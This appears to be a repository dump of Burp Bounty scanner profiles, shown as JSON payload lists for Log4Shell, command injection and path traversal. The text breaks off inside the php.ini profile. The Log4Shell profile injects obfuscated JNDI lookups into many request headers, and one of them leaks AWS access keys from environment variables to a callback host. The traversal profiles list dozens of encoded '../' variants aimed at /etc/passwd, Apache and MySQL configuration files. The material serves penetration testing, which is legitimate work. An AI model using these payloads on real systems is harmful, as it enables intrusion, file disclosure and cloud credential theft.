├── CVE-2021-44228.bb
├── Command_Injection.bb
├── Linux-Apache2-conf.bb
├── Linux-Path.bb
├── Linux-mysql-conf.bb
├── Linux-php.ini.bb
├── Linux-sshd-conf.bb
├── Linux-vsftpd-conf.bb
├── OOB-Callbacks.bb
├── RCE-linux-Based.bb
├── README.md
├── X-Headers-Collaborator.bb
└── tags.txt
/CVE-2021-44228.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "CVE-2021-44228",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@sy3omda",
8 | "Payloads": [
9 | "true,${jndi:ldap://127.0.0.1.{BC}:1389/sy3omda}",
10 | "true,${jndi:ldap://127.0.0.1.{BC}/sy3omda}",
11 | "true,${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{BC}/sy3omda}",
12 | "true,${${::-j}ndi:rmi://{BC}/sy3omda}",
13 | "true,${jndi:rmi://{BC}}",
14 | "true,${${lower:jndi}:${lower:rmi}://{BC}/sy3omda}",
15 | "true,${${lower:${lower:jndi}}:${lower:rmi}://{BC}/sy3omda}",
16 | "true,${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{BC}/sy3omda}",
17 | "true,${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{BC}/sy3omda}",
18 | "true,${jndi:dns://{BC}}",
19 | "true,${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.{BC}}"
20 | ],
21 | "Encoder": [],
22 | "UrlEncode": false,
23 | "CharsToUrlEncode": "",
24 | "Grep": [],
25 | "Tags": [
26 | "All",
27 | "log4shell"
28 | ],
29 | "PayloadResponse": false,
30 | "NotResponse": false,
31 | "TimeOut1": "",
32 | "TimeOut2": "",
33 | "isTime": false,
34 | "contentLength": "",
35 | "iscontentLength": false,
36 | "CaseSensitive": false,
37 | "ExcludeHTTP": false,
38 | "OnlyHTTP": false,
39 | "IsContentType": false,
40 | "ContentType": "",
41 | "HttpResponseCode": "",
42 | "NegativeCT": false,
43 | "IsResponseCode": false,
44 | "ResponseCode": "",
45 | "NegativeRC": false,
46 | "urlextension": "",
47 | "isurlextension": false,
48 | "NegativeUrlExtension": false,
49 | "MatchType": 1,
50 | "Scope": 0,
51 | "RedirType": 1,
52 | "MaxRedir": 9,
53 | "payloadPosition": 1,
54 | "payloadsFile": "",
55 | "grepsFile": "",
56 | "IssueName": "CVE-2021-44228",
57 | "IssueSeverity": "High",
58 | "IssueConfidence": "Certain",
59 | "IssueDetail": "Log4Shell with payload: \u003cbr\u003e\u003cpayload\u003e",
60 | "RemediationDetail": "",
61 | "IssueBackground": "",
62 | "RemediationBackground": "",
63 | "Header": [
64 | {
65 | "type": "Request",
66 | "match": "",
67 | "replace": "Accept: {PAYLOAD}",
68 | "regex": "String"
69 | },
70 | {
71 | "type": "Request",
72 | "match": "",
73 | "replace": "Accept-Encoding: {PAYLOAD}",
74 | "regex": "String"
75 | },
76 | {
77 | "type": "Request",
78 | "match": "",
79 | "replace": "Accept-Language: {PAYLOAD}",
80 | "regex": "String"
81 | },
82 | {
83 | "type": "Request",
84 | "match": "",
85 | "replace": "Access-Control-Request-Headers: {PAYLOAD}",
86 | "regex": "String"
87 | },
88 | {
89 | "type": "Request",
90 | "match": "",
91 | "replace": "Authentication: Basic {PAYLOAD}",
92 | "regex": "String"
93 | },
94 | {
95 | "type": "Request",
96 | "match": "",
97 | "replace": "Authentication: Bearer {PAYLOAD}",
98 | "regex": "String"
99 | },
100 | {
101 | "type": "Request",
102 | "match": "",
103 | "replace": "Cookie: {PAYLOAD}",
104 | "regex": "String"
105 | },
106 | {
107 | "type": "Request",
108 | "match": "",
109 | "replace": "Location: {PAYLOAD}",
110 | "regex": "String"
111 | },
112 | {
113 | "type": "Request",
114 | "match": "",
115 | "replace": "Origin: {PAYLOAD}",
116 | "regex": "String"
117 | },
118 | {
119 | "type": "Request",
120 | "match": "",
121 | "replace": "Referer: {PAYLOAD}",
122 | "regex": "String"
123 | },
124 | {
125 | "type": "Request",
126 | "match": "",
127 | "replace": "User-Agent: {PAYLOAD}",
128 | "regex": "String"
129 | },
130 | {
131 | "type": "Request",
132 | "match": "",
133 | "replace": "X-Forwarded-For: {PAYLOAD}",
134 | "regex": "String"
135 | },
136 | {
137 | "type": "Request",
138 | "match": "",
139 | "replace": "X-Origin: {PAYLOAD}",
140 | "regex": "String"
141 | },
142 | {
143 | "type": "Request",
144 | "match": "",
145 | "replace": "Forwarded: {PAYLOAD}",
146 | "regex": "String"
147 | },
148 | {
149 | "type": "Request",
150 | "match": "",
151 | "replace": "Forwarded-For: {PAYLOAD}",
152 | "regex": "String"
153 | },
154 | {
155 | "type": "Request",
156 | "match": "",
157 | "replace": "Forwarded-For-Ip: {PAYLOAD}",
158 | "regex": "String"
159 | },
160 | {
161 | "type": "Request",
162 | "match": "",
163 | "replace": "From: {PAYLOAD}",
164 | "regex": "String"
165 | },
166 | {
167 | "type": "Request",
168 | "match": "",
169 | "replace": "X-Forwarded: {PAYLOAD}",
170 | "regex": "String"
171 | },
172 | {
173 | "type": "Request",
174 | "match": "",
175 | "replace": "X-Forwarded-By: {PAYLOAD}",
176 | "regex": "String"
177 | },
178 | {
179 | "type": "Request",
180 | "match": "",
181 | "replace": "X-Forwarded-For-Original: {PAYLOAD}",
182 | "regex": "String"
183 | },
184 | {
185 | "type": "Request",
186 | "match": "",
187 | "replace": "X-Forwarded-Host: {PAYLOAD}",
188 | "regex": "String"
189 | },
190 | {
191 | "type": "Request",
192 | "match": "",
193 | "replace": "X-Forwarded-Port: {PAYLOAD}",
194 | "regex": "String"
195 | },
196 | {
197 | "type": "Request",
198 | "match": "",
199 | "replace": "X-Forwarded-Protocol: {PAYLOAD}",
200 | "regex": "String"
201 | },
202 | {
203 | "type": "Request",
204 | "match": "",
205 | "replace": "X-Forwarded-Scheme: {PAYLOAD}",
206 | "regex": "String"
207 | },
208 | {
209 | "type": "Request",
210 | "match": "",
211 | "replace": "X-Forwarded-Server: {PAYLOAD}",
212 | "regex": "String"
213 | },
214 | {
215 | "type": "Request",
216 | "match": "",
217 | "replace": "X-Forwarder-For: {PAYLOAD}",
218 | "regex": "String"
219 | },
220 | {
221 | "type": "Request",
222 | "match": "",
223 | "replace": "X-Forward-For: {PAYLOAD}",
224 | "regex": "String"
225 | },
226 | {
227 | "type": "Request",
228 | "match": "",
229 | "replace": "X-HTTP-Method-Override: {PAYLOAD}",
230 | "regex": "String"
231 | },
232 | {
233 | "type": "Request",
234 | "match": "",
235 | "replace": "X-Api-Version: {PAYLOAD}",
236 | "regex": "String"
237 | }
238 | ],
239 | "VariationAttributes": [],
240 | "InsertionPointType": [
241 | 32
242 | ],
243 | "Scanas": false,
244 | "Scantype": 0,
245 | "pathDiscovery": false
246 | }
247 | ]
--------------------------------------------------------------------------------
/Command_Injection.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "Command_Injection",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "",
8 | "Payloads": [
9 | "true,print(\u0027sy3omda\u0027)",
10 | "true,;print(\u0027sy3omda\u0027)",
11 | "true,\u0027.print(\u0027sy3omda\u0027).\u0027",
12 | "true,\u003c?php print(\u0027sy3omda\u0027)?\u003e"
13 | ],
14 | "Encoder": [],
15 | "UrlEncode": false,
16 | "CharsToUrlEncode": "",
17 | "Grep": [
18 | "true,,*sy3omda*"
19 | ],
20 | "Tags": [
21 | "commandinjection",
22 | "All"
23 | ],
24 | "PayloadResponse": false,
25 | "NotResponse": false,
26 | "TimeOut1": "",
27 | "TimeOut2": "",
28 | "isTime": false,
29 | "contentLength": "",
30 | "iscontentLength": false,
31 | "CaseSensitive": false,
32 | "ExcludeHTTP": false,
33 | "OnlyHTTP": false,
34 | "IsContentType": false,
35 | "ContentType": "",
36 | "HttpResponseCode": "",
37 | "NegativeCT": false,
38 | "IsResponseCode": false,
39 | "ResponseCode": "",
40 | "NegativeRC": false,
41 | "urlextension": "",
42 | "isurlextension": false,
43 | "NegativeUrlExtension": false,
44 | "MatchType": 2,
45 | "Scope": 0,
46 | "RedirType": 4,
47 | "MaxRedir": 3,
48 | "payloadPosition": 1,
49 | "payloadsFile": "",
50 | "grepsFile": "",
51 | "IssueName": "Command Injection",
52 | "IssueSeverity": "High",
53 | "IssueConfidence": "Certain",
54 | "IssueDetail": "Command Injection payload: \u003cbr\u003e \u003cpayload\u003e",
55 | "RemediationDetail": "",
56 | "IssueBackground": "",
57 | "RemediationBackground": "",
58 | "Header": [],
59 | "VariationAttributes": [],
60 | "InsertionPointType": [
61 | 65,
62 | 32,
63 | 2,
64 | 35,
65 | 34,
66 | 0,
67 | 37
68 | ],
69 | "Scanas": false,
70 | "Scantype": 0,
71 | "pathDiscovery": false
72 | }
73 | ]
--------------------------------------------------------------------------------
/Linux-Apache2-conf.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "Linux-Apache2-conf",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,..%5c..%5c{FILE}",
10 | "true,..%5c..%5c..%5c{FILE}",
11 | "true,..%5c..%5c..%5c..%5c{FILE}",
12 | "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
13 | "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
14 | "true,..%252f{FILE}",
15 | "true,..%252f..%252f{FILE}",
16 | "true,..%252f..%252f..%252f{FILE}",
17 | "true,..%252f..%252f..%252f..%252f{FILE}",
18 | "true,./../{FILE}",
19 | "true,./.././../{FILE}",
20 | "true,./.././.././.././../{FILE}",
21 | "true,./.././.././.././.././../{FILE}",
22 | "true,..///{FILE}",
23 | "true,..///..///{FILE}",
24 | "true,..///..///..///{FILE}",
25 | "true,..///..///..///..///{FILE}",
26 | "true,..///..///..///..///..///{FILE}",
27 | "true,..//{FILE}",
28 | "true,..//..//{FILE}",
29 | "true,..//..//..//{FILE}",
30 | "true,..//..//..//..//{FILE}",
31 | "true,..//..//..//..//..//{FILE}",
32 | "true,../{FILE}",
33 | "true,../../{FILE}",
34 | "true,../../../{FILE}",
35 | "true,../../../../{FILE}",
36 | "true,../../../../../{FILE}",
37 | "true,../{FILE}%00",
38 | "true,../../{FILE}%00",
39 | "true,../../../{FILE}%00",
40 | "true,../../../../{FILE}%00",
41 | "true,../../../../../{FILE}%00",
42 | "true,....//{FILE}",
43 | "true,....//....//{FILE}",
44 | "true,....//....//....//{FILE}",
45 | "true,....//....//....//....//{FILE}",
46 | "true,....//....//....//....//....//{FILE}",
47 | "true,....%2F%2F{FILE}",
48 | "true,....%2F%2F....%2F%2F{FILE}",
49 | "true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
50 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
51 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
52 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
53 | "true,..%2f{FILE}",
54 | "true,..%2f..%2f{FILE}",
55 | "true,..%2f..%2f..%2f{FILE}",
56 | "true,..%2f..%2f..%2f..%2f{FILE}",
57 | "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
58 | "true,..%%32%66{FILE}",
59 | "true,..%%32%66..%%32%66{FILE}",
60 | "true,..%%32%66..%%32%66..%%32%66{FILE}",
61 | "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
62 | "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
63 | "true,%2e%2e/{FILE}",
64 | "true,%2e%2e/%2e%2e/{FILE}",
65 | "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
66 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
67 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
68 | "true,%252e%252e/{FILE}",
69 | "true,%252e%252e/%252e%252e/{FILE}",
70 | "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
71 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
72 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
73 | "true,%%32%65%%32%65/{FILE}",
74 | "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
75 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
76 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
77 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}"
78 | ],
79 | "Encoder": [],
80 | "UrlEncode": false,
81 | "CharsToUrlEncode": "",
82 | "Grep": [
83 | "true,,Apache server configuration"
84 | ],
85 | "Tags": [
86 | "PathTraversal",
87 | "All"
88 | ],
89 | "PayloadResponse": false,
90 | "NotResponse": false,
91 | "TimeOut1": "",
92 | "TimeOut2": "",
93 | "isTime": false,
94 | "contentLength": "",
95 | "iscontentLength": false,
96 | "CaseSensitive": false,
97 | "ExcludeHTTP": false,
98 | "OnlyHTTP": false,
99 | "IsContentType": false,
100 | "ContentType": "",
101 | "HttpResponseCode": "",
102 | "NegativeCT": false,
103 | "IsResponseCode": false,
104 | "ResponseCode": "",
105 | "NegativeRC": false,
106 | "urlextension": "",
107 | "isurlextension": false,
108 | "NegativeUrlExtension": false,
109 | "MatchType": 1,
110 | "Scope": 0,
111 | "RedirType": 0,
112 | "MaxRedir": 0,
113 | "payloadPosition": 1,
114 | "payloadsFile": "",
115 | "grepsFile": "",
116 | "IssueName": "Linux-Apache2-conf",
117 | "IssueSeverity": "Medium",
118 | "IssueConfidence": "Certain",
119 | "IssueDetail": "Linux-Apache2-conf: \u003cbr\u003e \u003cgrep\u003e",
120 | "RemediationDetail": "",
121 | "IssueBackground": "",
122 | "RemediationBackground": "",
123 | "Header": [
124 | {
125 | "type": "Payload",
126 | "match": "{FILE}",
127 | "replace": "etc/apache2/apache2.conf",
128 | "regex": "String"
129 | }
130 | ],
131 | "VariationAttributes": [],
132 | "InsertionPointType": [
133 | 32,
134 | 0,
135 | 37
136 | ],
137 | "Scanas": false,
138 | "Scantype": 0,
139 | "pathDiscovery": false
140 | }
141 | ]
--------------------------------------------------------------------------------
/Linux-Path.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "Linux-Path",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,..%5c..%5c{FILE}",
10 | "true,..%5c..%5c..%5c{FILE}",
11 | "true,..%5c..%5c..%5c..%5c{FILE}",
12 | "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
13 | "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
14 | "true,..%252f{FILE}",
15 | "true,..%252f..%252f{FILE}",
16 | "true,..%252f..%252f..%252f{FILE}",
17 | "true,..%252f..%252f..%252f..%252f{FILE}",
18 | "true,./../{FILE}",
19 | "true,./.././../{FILE}",
20 | "true,./.././.././.././../{FILE}",
21 | "true,./.././.././.././.././../{FILE}",
22 | "true,..///{FILE}",
23 | "true,..///..///{FILE}",
24 | "true,..///..///..///{FILE}",
25 | "true,..///..///..///..///{FILE}",
26 | "true,..///..///..///..///..///{FILE}",
27 | "true,..//{FILE}",
28 | "true,..//..//{FILE}",
29 | "true,..//..//..//{FILE}",
30 | "true,..//..//..//..//{FILE}",
31 | "true,..//..//..//..//..//{FILE}",
32 | "true,../{FILE}",
33 | "true,../../{FILE}",
34 | "true,../../../{FILE}",
35 | "true,../../../../{FILE}",
36 | "true,../../../../../{FILE}",
37 | "true,../{FILE}%00",
38 | "true,../../{FILE}%00",
39 | "true,../../../{FILE}%00",
40 | "true,../../../../{FILE}%00",
41 | "true,../../../../../{FILE}%00",
42 | "true,....//{FILE}",
43 | "true,....//....//{FILE}",
44 | "true,....//....//....//{FILE}",
45 | "true,....//....//....//....//{FILE}",
46 | "true,....//....//....//....//....//{FILE}",
47 | "true,....%2F%2F{FILE}",
48 | "true,....%2F%2F....%2F%2F{FILE}",
49 | "true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
50 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
51 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
52 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
53 | "true,..%2f{FILE}",
54 | "true,..%2f..%2f{FILE}",
55 | "true,..%2f..%2f..%2f{FILE}",
56 | "true,..%2f..%2f..%2f..%2f{FILE}",
57 | "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
58 | "true,..%%32%66{FILE}",
59 | "true,..%%32%66..%%32%66{FILE}",
60 | "true,..%%32%66..%%32%66..%%32%66{FILE}",
61 | "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
62 | "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
63 | "true,%2e%2e/{FILE}",
64 | "true,%2e%2e/%2e%2e/{FILE}",
65 | "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
66 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
67 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
68 | "true,%252e%252e/{FILE}",
69 | "true,%252e%252e/%252e%252e/{FILE}",
70 | "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
71 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
72 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
73 | "true,%%32%65%%32%65/{FILE}",
74 | "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
75 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
76 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
77 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}"
78 | ],
79 | "Encoder": [],
80 | "UrlEncode": false,
81 | "CharsToUrlEncode": "",
82 | "Grep": [
83 | "true,,*root:x*"
84 | ],
85 | "Tags": [
86 | "PathTraversal",
87 | "All"
88 | ],
89 | "PayloadResponse": false,
90 | "NotResponse": false,
91 | "TimeOut1": "",
92 | "TimeOut2": "",
93 | "isTime": false,
94 | "contentLength": "",
95 | "iscontentLength": false,
96 | "CaseSensitive": false,
97 | "ExcludeHTTP": false,
98 | "OnlyHTTP": false,
99 | "IsContentType": false,
100 | "ContentType": "",
101 | "HttpResponseCode": "",
102 | "NegativeCT": false,
103 | "IsResponseCode": false,
104 | "ResponseCode": "",
105 | "NegativeRC": false,
106 | "urlextension": "",
107 | "isurlextension": false,
108 | "NegativeUrlExtension": false,
109 | "MatchType": 2,
110 | "Scope": 0,
111 | "RedirType": 0,
112 | "MaxRedir": 0,
113 | "payloadPosition": 1,
114 | "payloadsFile": "",
115 | "grepsFile": "",
116 | "IssueName": "Linux-Path",
117 | "IssueSeverity": "High",
118 | "IssueConfidence": "Certain",
119 | "IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e",
120 | "RemediationDetail": "",
121 | "IssueBackground": "",
122 | "RemediationBackground": "",
123 | "Header": [
124 | {
125 | "type": "Payload",
126 | "match": "{FILE}",
127 | "replace": "etc/passwd",
128 | "regex": "String"
129 | }
130 | ],
131 | "VariationAttributes": [],
132 | "InsertionPointType": [
133 | 32,
134 | 0,
135 | 37
136 | ],
137 | "Scanas": false,
138 | "Scantype": 0,
139 | "pathDiscovery": false
140 | }
141 | ]
--------------------------------------------------------------------------------
/Linux-mysql-conf.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "Linux-mysql-conf",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,..%5c..%5c{FILE}",
10 | "true,..%5c..%5c..%5c{FILE}",
11 | "true,..%5c..%5c..%5c..%5c{FILE}",
12 | "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
13 | "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
14 | "true,..%252f{FILE}",
15 | "true,..%252f..%252f{FILE}",
16 | "true,..%252f..%252f..%252f{FILE}",
17 | "true,..%252f..%252f..%252f..%252f{FILE}",
18 | "true,./../{FILE}",
19 | "true,./.././../{FILE}",
20 | "true,./.././.././.././../{FILE}",
21 | "true,./.././.././.././.././../{FILE}",
22 | "true,..///{FILE}",
23 | "true,..///..///{FILE}",
24 | "true,..///..///..///{FILE}",
25 | "true,..///..///..///..///{FILE}",
26 | "true,..///..///..///..///..///{FILE}",
27 | "true,..//{FILE}",
28 | "true,..//..//{FILE}",
29 | "true,..//..//..//{FILE}",
30 | "true,..//..//..//..//{FILE}",
31 | "true,..//..//..//..//..//{FILE}",
32 | "true,../{FILE}",
33 | "true,../../{FILE}",
34 | "true,../../../{FILE}",
35 | "true,../../../../{FILE}",
36 | "true,../../../../../{FILE}",
37 | "true,../{FILE}%00",
38 | "true,../../{FILE}%00",
39 | "true,../../../{FILE}%00",
40 | "true,../../../../{FILE}%00",
41 | "true,../../../../../{FILE}%00",
42 | "true,....//{FILE}",
43 | "true,....//....//{FILE}",
44 | "true,....//....//....//{FILE}",
45 | "true,....//....//....//....//{FILE}",
46 | "true,....//....//....//....//....//{FILE}",
47 | "true,....%2F%2F{FILE}",
48 | "true,....%2F%2F....%2F%2F{FILE}",
49 | "true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
50 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
51 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
52 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
53 | "true,..%2f{FILE}",
54 | "true,..%2f..%2f{FILE}",
55 | "true,..%2f..%2f..%2f{FILE}",
56 | "true,..%2f..%2f..%2f..%2f{FILE}",
57 | "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
58 | "true,..%%32%66{FILE}",
59 | "true,..%%32%66..%%32%66{FILE}",
60 | "true,..%%32%66..%%32%66..%%32%66{FILE}",
61 | "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
62 | "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
63 | "true,%2e%2e/{FILE}",
64 | "true,%2e%2e/%2e%2e/{FILE}",
65 | "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
66 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
67 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
68 | "true,%252e%252e/{FILE}",
69 | "true,%252e%252e/%252e%252e/{FILE}",
70 | "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
71 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
72 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
73 | "true,%%32%65%%32%65/{FILE}",
74 | "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
75 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
76 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
77 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}"
78 | ],
79 | "Encoder": [],
80 | "UrlEncode": false,
81 | "CharsToUrlEncode": "",
82 | "Grep": [
83 | "true,,MySQL database server"
84 | ],
85 | "Tags": [
86 | "All",
87 | "PathTraversal"
88 | ],
89 | "PayloadResponse": false,
90 | "NotResponse": false,
91 | "TimeOut1": "",
92 | "TimeOut2": "",
93 | "isTime": false,
94 | "contentLength": "",
95 | "iscontentLength": false,
96 | "CaseSensitive": false,
97 | "ExcludeHTTP": false,
98 | "OnlyHTTP": false,
99 | "IsContentType": false,
100 | "ContentType": "",
101 | "HttpResponseCode": "",
102 | "NegativeCT": false,
103 | "IsResponseCode": false,
104 | "ResponseCode": "",
105 | "NegativeRC": false,
106 | "urlextension": "",
107 | "isurlextension": false,
108 | "NegativeUrlExtension": false,
109 | "MatchType": 1,
110 | "Scope": 0,
111 | "RedirType": 0,
112 | "MaxRedir": 0,
113 | "payloadPosition": 1,
114 | "payloadsFile": "",
115 | "grepsFile": "",
116 | "IssueName": "Linux-mysql-conf",
117 | "IssueSeverity": "Medium",
118 | "IssueConfidence": "Certain",
119 | "IssueDetail": "Linux-mysql-conf: \u003cbr\u003e \u003cgrep\u003e",
120 | "RemediationDetail": "",
121 | "IssueBackground": "",
122 | "RemediationBackground": "",
123 | "Header": [
124 | {
125 | "type": "Payload",
126 | "match": "{FILE}",
127 | "replace": "etc/mysql/my.cnf",
128 | "regex": "String"
129 | }
130 | ],
131 | "VariationAttributes": [],
132 | "InsertionPointType": [
133 | 32,
134 | 0,
135 | 37
136 | ],
137 | "Scanas": false,
138 | "Scantype": 0,
139 | "pathDiscovery": false
140 | }
141 | ]
--------------------------------------------------------------------------------
/Linux-php.ini.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "Linux-php.ini",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,..%5c..%5c{FILE}",
10 | "true,..%5c..%5c..%5c{FILE}",
11 | "true,..%5c..%5c..%5c..%5c{FILE}",
12 | "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
13 | "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
14 | "true,..%252f{FILE}",
15 | "true,..%252f..%252f{FILE}",
16 | "true,..%252f..%252f..%252f{FILE}",
17 | "true,..%252f..%252f..%252f..%252f{FILE}",
18 | "true,./../{FILE}",
19 | "true,./.././../{FILE}",
20 | "true,./.././.././.././../{FILE}",
21 | "true,./.././.././.././.././../{FILE}",
22 | "true,..///{FILE}",
23 | "true,..///..///{FILE}",
24 | "true,..///..///..///{FILE}",
25 | "true,..///..///..///..///{FILE}",
26 | "true,..///..///..///..///..///{FILE}",
27 | "true,..//{FILE}",
28 | "true,..//..//{FILE}",
29 | "true,..//..//..//{FILE}",
30 | "true,..//..//..//..//{FILE}",
31 | "true,..//..//..//..//..//{FILE}",
32 | "true,../{FILE}",
33 | "true,../../{FILE}",
34 | "true,../../../{FILE}",
35 | "true,../../../../{FILE}",
36 | "true,../../../../../{FILE}",
37 | "true,../{FILE}%00",
38 | "true,../../{FILE}%00",
39 | "true,../../../{FILE}%00",
40 | "true,../../../../{FILE}%00",
41 | "true,../../../../../{FILE}%00",
42 | "true,....//{FILE}",
43 | "true,....//....//{FILE}",
44 | "true,....//....//....//{FILE}",
45 | "true,....//....//....//....//{FILE}",
46 | "true,....//....//....//....//....//{FILE}",
47 | "true,....%2F%2F{FILE}",
48 | "true,....%2F%2F....%2F%2F{FILE}",
49 | "true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
50 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
51 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
52 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
53 | "true,..%2f{FILE}",
54 | "true,..%2f..%2f{FILE}",
55 | "true,..%2f..%2f..%2f{FILE}",
56 | "true,..%2f..%2f..%2f..%2f{FILE}",
57 | "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
58 | "true,..%%32%66{FILE}",
59 | "true,..%%32%66..%%32%66{FILE}",
60 | "true,..%%32%66..%%32%66..%%32%66{FILE}",
61 | "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
62 | "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
63 | "true,%2e%2e/{FILE}",
64 | "true,%2e%2e/%2e%2e/{FILE}",
65 | "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
66 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
67 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
68 | "true,%252e%252e/{FILE}",
69 | "true,%252e%252e/%252e%252e/{FILE}",
70 | "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
71 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
72 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
73 | "true,%%32%65%%32%65/{FILE}",
74 | "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
75 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
76 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
77 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}"
78 | ],
79 | "Encoder": [],
80 | "UrlEncode": false,
81 | "CharsToUrlEncode": "",
82 | "Grep": [
83 | "true,,About php.ini"
84 | ],
85 | "Tags": [
